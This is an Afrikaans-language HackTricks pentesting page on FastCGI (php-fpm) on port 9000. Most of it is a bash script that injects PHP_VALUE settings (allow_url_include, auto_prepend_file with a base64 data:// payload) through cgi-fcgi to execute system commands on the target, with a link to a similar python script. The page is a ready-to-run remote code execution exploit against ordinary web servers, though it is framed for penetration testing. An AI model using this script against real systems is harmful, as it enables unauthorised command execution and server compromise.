9000 - Pentesting FastCGI

Ondersteun HackTricks

Basiese Inligting

As jy wil leer wat FastCGI is kyk die volgende bladsy:

disable_functions bypass - php-fpm/FastCGI

Standaard FastCGI loop op poort 9000 en word nie deur nmap erken nie. Gewoonlik luister FastCGI net op localhost.

RCE

Dit is redelik maklik om FastCGI te laat uitvoer willekeurige kode:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/public/index.php" # Exisiting file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
OUTPUT=$(mktemp)
env -i \
PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

cat $OUTPUT
done

of jy kan ook die volgende python skrip gebruik: https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75

Ondersteun HackTricks

Last updated